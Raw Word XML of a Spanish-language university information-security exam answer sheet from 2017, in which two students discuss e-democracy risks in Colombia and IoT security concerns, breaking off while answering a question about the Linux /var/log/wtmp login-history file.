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E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SEGURIDAD INFORMÁTICA – 2do. Parcial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Diciembre de 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fecha Límite de Entrega: Viernes 15 de Diciembre (12:00 p.m.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="1054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8133"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="12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E765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0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CÓDIGO:160003120</w:t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5B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0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NOMBRE: Brayan Herrera Rocha</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E765B2">
        <w:trPr>
          <w:trHeight w:val="12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E765B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0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CÓDIGO:160003347</w:t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5B2" w:rsidRDefault="00FF6D41">
            <w:pPr>
              <w:contextualSpacing w:val="0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NOMBRE: Cristian Iván Rey Orozco</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing w:val="0"/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posOffset>139700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>63500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6286500" cy="38100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765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Responda: (en máximo 5 renglones cada aspecto</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_6kw1ztfb31wy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>¿Qué implicaciones (enuncie 2 positivas y 2 negativas/riesgos) podría tener la aplicación de la e-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>democracy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en nuestro país?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_4qz78k9w8k3z" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Positivas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_ra5192edlit8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Algo positivo sobre e-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>democracy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es que atraerá de nuevo a la ciudadanía a votar en Colombia ya que en los últimos años ha habido mucha abstención de la gente a salir a votar, y sería más atractiva esta forma de votación.</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "author" : [ { "dropping-particle" : "", "family" : "FRANGAKIS", "given" : "Nikos", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "e-democracy es", "type" : "article" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=1aa420c0-ef99-4d9c-b877-a61430e0cedb" ] } ], "mendeley" : { "formattedCitation" : "[1]", "plainTextFormattedCitation" : "[1]", "previouslyFormattedCitation" : "[1]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD7531" w:rsidRPr="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_flk4o7kqllf4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>democracy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evita el error humano ya sea en el conteo o uso del sufragio y logra que el sistema de votación sea más rápido y eficaz.</w:t>
      </w:r>
      <w:r w:rsidR="003F52F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="003F52F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "author" : [ { "dropping-particle" : "", "family" : "FRANGAKIS", "given" : "Nikos", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "e-democracy es", "type" : "article" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=1aa420c0-ef99-4d9c-b877-a61430e0cedb" ] } ], "mendeley" : { "formattedCitation" : "[1]", "plainTextFormattedCitation" : "[1]", "previouslyFormattedCitation" : "[1]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="003F52F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003F52F1" w:rsidRPr="003F52F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="003F52F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_nk7fbkjwctyu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Negativos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_5cpp6xzhbzxg" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fallos en infraestructura eléctrica llevando a </w:t>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sabotaje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el sufragio, o problemas de saturación por concurrencia del servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "author" : [ { "dropping-particle" : "", "family" : "FRANGAKIS", "given" : "Nikos", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "e-democracy es", "type" : "article" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=1aa420c0-ef99-4d9c-b877-a61430e0cedb" ] } ], "mendeley" : { "formattedCitation" : "[1]", "plainTextFormattedCitation" : "[1]", "previouslyFormattedCitation" : "[1]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD7531" w:rsidRPr="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_sy3yy29r501o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se crearán base de datos con mucha información personal que podrían ser usadas incorrectamente o cedidas sin permiso.</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Argumente brevemente sobre 3 aspectos críticos de seguridad que deben tenerse en cuenta sobre el IoT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Control de los dispositivos que estén conectados al sistema IoT, </w:t>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ya que,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si uno se llega a perder, la persona que lo encontrara podría tener acceso total a é, y lo que se buscaría es poder eliminar el dispositivo que se </w:t>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>perdió</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Garantizar la confidencialidad de la información del usuario, ya que en los diferentes dispositivos que se encuentren conectados a IoT, se guarda información importante la cual puede ser vulnerada por un tercero. </w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "author" : [ { "dropping-particle" : "", "family" : "P\u00fablico", "given" : "Documento", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "SEGURIDAD EN INTERNET DE LAS COSAS Estado del arte", "type" : "article-journal" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=2910fdc6-390b-3c6e-85f8-6b3f9b2987d3" ] } ], "mendeley" : { "formattedCitation" : "[2]", "plainTextFormattedCitation" : "[2]", "previouslyFormattedCitation" : "[2]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CD7531" w:rsidRPr="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00CD7531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs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Seguridad de los diferentes dispositivos ya que estos pueden ser interceptados por un tercero y ser usados para cosas indebidas como por ejemplo en la domótica vulnerar los hogares que usen IoT y robar a los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00FF6D41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Para qué sirve el archivo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wtmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>?, muestre como accede a los datos de este archivo, analice algunas líneas del contenido de este archivo en su máquina. (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Evidencie con una captura de pantalla de su propio sistema – donde se observe la fecha y el nombre de la máquina</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E765B2" w:rsidRDefault="00E765B2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E765B2" w:rsidRDefault="00FF6D41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WTMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">es un archivo binario que contiene el historial de </w:t>
      </w:r>
      <w:r w:rsidR="00864591">
        <w:rPr>
